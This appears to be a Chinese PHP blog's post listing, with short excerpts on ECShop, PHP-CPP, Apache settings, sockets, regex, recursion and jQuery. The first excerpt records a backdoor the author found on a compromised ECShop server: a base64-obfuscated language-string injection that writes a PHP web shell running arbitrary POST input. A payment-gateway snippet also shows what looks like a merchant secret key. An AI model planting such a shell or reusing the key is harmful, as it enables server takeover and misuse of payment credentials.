有个服务器没怎么管它,发现磁盘莫名奇妙的全满了。上面是一些ECShop商城,很久没更新了。ECShop本来漏洞就比较多,国内用的也多,估计好多人没事都在扫吧。。。
发现一些后门,记录下:
$_LANG['is_paid'] = "状态${${fputs(fopen(base64_decode(aW5kZS5waHA),w),base64_decode(PD9waHAgJGsgPSBzdHJfcmVwbGFjZSgiOSIsIiIsImE5czk5czllOXI5dCIpOyRrKCRfUE9TVFsiOSJdKTsgPz4))}}";
...
PHP-CPP是一个用来开发PHP扩展的C++库,下面引用自官方介绍:
The PHP-CPP library is a C++ library for developing PHP extensions. It offers a collection of well documented and easy-to-use classes that can be used and extended to build native extensions for PHP.
1.安装PHP-CPP
PHP-CPP目前只支持Linux系统和OSX,我这里用的是CentOS 6.0。
google搜索了下,折腾了一会才找到这个帖子:http://forum.symfony-project.org/viewtopic.php?t=68531
留个档!
错误描述:
ParameterNotFoundException: You have requested a non-existent parameter "kernel.debug".
...
1、includes/lib_base.php文件中的gd_version()函数
此函数是直接静态调用cls_image类中的gd_version方法,原始代码:return cls_image::gd_version();因为cls_image类中的gd_version非静态方法,这样调用会出现Strict级别错误:
Strict Standards: Non-static method cls_image::gd_version() should not be called statically
...
[FONT-SIZE=3]
官方文档只有asp的例子。环迅的这个用的SOAP,参数传输文档也没说明,有点坑爹。。。摸索了下,在php下面可以用如下代码实现:
注:php需安装SOAP扩展。
[CODE=php]
header('content-type:text/html;charset=utf-8');
$Mer_code = '000166';
$Mer_key = 'cQ0YAtyVNoiEeKrZJ5F5Qp2pMohwspfv6XoiU3wHYtcc1YOEhJ3SjDVMylmwmbD7jMhg5ifqjX67mzNN02p8MmlSb1KIqa5XF4TEQHjZEmJmhyAYxyVJMeLWBofdxwaj';
...
[/CODE][/FONT-SIZE]
1、apache
apache的配置文件:httpd.conf
HostnameLookups
语法:HostnameLookups On|Off|Double
默认:HostnameLookups Off
此选项可用来配置是否在客户端IP上启用DNS查询,一般设为off。
KeepAlive
语法:KeepAlive On|Off
...
因为用到客户端程序与网页三方支付接口交互,我觉得可以这样来实现,在三方支付回调页面中放一个socket服务端,客户端程序与这个socket服务端进行交互,以此来进行最终业务逻辑处理。
php中socket编程,简单实例代码如下:
服务端:...
[FONT-SIZE=3]GD库函数的简单应用。[/FONT-SIZE]
[FONT-SIZE=3]熟悉下正则表达式的运用
[CODE=php]
/*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
*/
header('Content-Type:text/html;charset=utf-8');
date_default_timezone_set('PRC');
require './Snoopy.class.php';
if(isset($_POST['submit']) && isset($_POST['url'])){
...
[/CODE][/FONT-SIZE]
[FONT-SIZE=3]
一般在做网站时都需要对用户提交的查询字符串进行转义,以防止sql注入,php中简单的可以用
addslashes($str)函数来实现,对于多维数组,需要遍历每个数组元素进行处理,有两种办法:
1、系统自带的相关函数
2、自写函数,用递归处理
[/FONT-SIZE]
[FONT-SIZE=3]
PHP中级联目录的打印、创建及删除,主要是运用[FONT-COLOR=Red]
递归[/FONT-COLOR]的思想。
[CODE=php]
//级联目录打印
function printDir($dir){
$h=opendir($dir);
while($row=readdir($h)){
if($row=='.' || $row=='..'){
continue;
...
[/FONT-SIZE]
什么是正则表达式?
从最基本的方面来理解,正则表达式可以被视为一种字符串的模式匹配或匹配模式。在php中,最常用的是PCRE(Perl Compatible Regular Expressions)库。在这里,我们将努力去让你理解那些毫无意义的象形文字(元字符),让你在自己的应用程序中可以使用这样一个强大的工具。不要想着一口气能吃成一个胖子,一点一滴的学习,当你遇到不同的问题时可以回头再来学习它^_
1.count函数
int count ( mixed $var [, int $mode ] )
计算数组中的单元数目或对象中的属性个数
<?php
$season = array (
"春",
"夏",
...
原理就是设置外层position为relative,内层position为absolute,然后控制图片的top属性来实现上下滚动效果。
代码如下:
<!DOCTYPE html>
<head>
<script src="jquery/jquery-1.8.0.js"></script>
<script>
function showImg(index){
...